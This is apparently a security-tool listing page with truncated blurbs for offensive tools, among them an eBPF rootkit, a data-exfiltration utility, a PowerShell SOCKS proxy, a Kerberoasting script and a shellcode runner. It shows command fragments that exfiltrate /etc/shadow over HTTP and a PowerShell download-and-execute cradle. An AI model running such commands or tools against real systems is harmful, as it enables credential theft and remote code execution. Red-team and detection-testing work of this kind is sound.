TripleCross – A Linux eBPF Rootkit With A Backdoor, C2, Library Injection, Execution Hijacking, Persistence And Stealth Capabilities.

TripleCross is a Linux eBPF rootkit that demonstrates the offensive capabilities of the eBPF technology. TripleCross is inspired by previous implant designs in this area, notably the works of Jeff Dileo at DEFCON 271, Pat Hogan at DEFCON 292, Guillaume Fournier and Sylvain Afchain also at DEFCON 293, and Kris Nóva’s Boopkit4. We reuse andRead More

Chisel-Strike – A .NET XOR Encrypted Cobalt Strike Aggressor Implementation For Chisel To Utilize Faster Proxy And Advanced Socks5 Capabilities

A .NET XOR encrypted cobalt strike aggressor implementation for chisel to utilize faster proxy and advanced socks5 capabilities. Why write this? In my experience I found socks4/socks4a proxies quite slow in comparison to its socks5 counterparts and a lack of implementation of socks5 in most C2 frameworks. There is a C# wrapper around the goRead More

Exfilkit – Data Exfiltration Utility For Testing Detection Capabilities

Data exfiltration utility for testing detection capabilities Description Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only. Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./ -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./ -m exfilkit.methods.http.param_cipher.GETClient -rh -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTPRead More

PowerProxy – PowerShell SOCKS Proxy With Reverse Proxy Capabilities

PowerShell SOCKS proxy with reverse proxy capabilities. PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections. Setup Import the script: iex (new-object net.webclient).downloadstring(“”) # ORImport-Module \ canRead More

Ocr-Recon – Tool To Find A Particular String In A List Of URLs Using Tesseract’S OCR (Optical Character Recognition) Capabilities

This tool is useful to find a particular string in a list of URLs using tesseract’s OCR (Optical Character Recognition) capabilities. Usage Usage: python3 listwithURLs stringtosearch Download Ocr-Recon

Abaddon – Make red team operations faster, more repeatable, stealthier, while including value-added tools and bringing numerous reporting capabilities

Red team operations involve miscellaneous skills, last several months and are politically sensitive; they require a lot of monitoring, consolidating and caution. Wavestone’s red team operations management software, Abaddon, has been designed to make red team operations faster, more repeatable, stealthier, while including value-added tools and bringing numerous reporting capabilities. Because: There are tons ofRead More

VECTR – A Tool That Facilitates Tracking Of Your Red And Blue Team Testing Activities To Measure Detection And Prevention Capabilities Across Different Attack Scenarios

VECTR documentation can be found here: VECTR Community Discord Channel: VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios. VECTR provides the ability to create assessment groups, which consist of a collection of Campaigns and supporting TestRead More

On-The-Fly – Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)

▒█████ ███▄ █ ▄▄▄█████▓ ██░ ██ ▓█████ █████ ██▓ ▓██ ██▓▒██▒ ██▒ ██ ▀█ █ ▓ ██▒ ▓▒▒▓██░ ██ ▓█ ▀ ▓██ ▓██▒ ▒██ ██▒▒██░ ██▒▓██ ▀█ ██▒ ▒ ▓██░ ▒░░▒██▀▀██ ▒███ ▒████ ▒██░ ▒██ ██░▒██ ██░▓██▒ ▐▌██▒ ░ ▓██▓ ░ ░▓█ ░██ ▒▓█ ▄ ░▓█▒ ▒██░ ░ ▐██▓░░ ████▓▒░▒██░ ▓██░ ▒██▒ ░ ░▓█▒░██▓▒░▒████ ▒░▒█░Read More

targetedKerberoast – Kerberoast With ACL Abuse Capabilities

targetedKerberoast is a Python script that can, like many others (e.g., print “kerberoast” hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the “kerberoast” hash, and deleteRead More

GoPurple – Yet Another Shellcode Runner Consists Of Different Techniques For Evaluating Detection Capabilities Of Endpoint Security Solutions

This project is a simple collection of various shell code injection techniques, aiming to streamline the process of endpoint detection evaluation, beside challenging myself to get into Golang world. Installation 1 – Requires go installed. 2 – Build the application from the project’s directory: go build. Set GOOS=windows if the build system is not Windows.Read More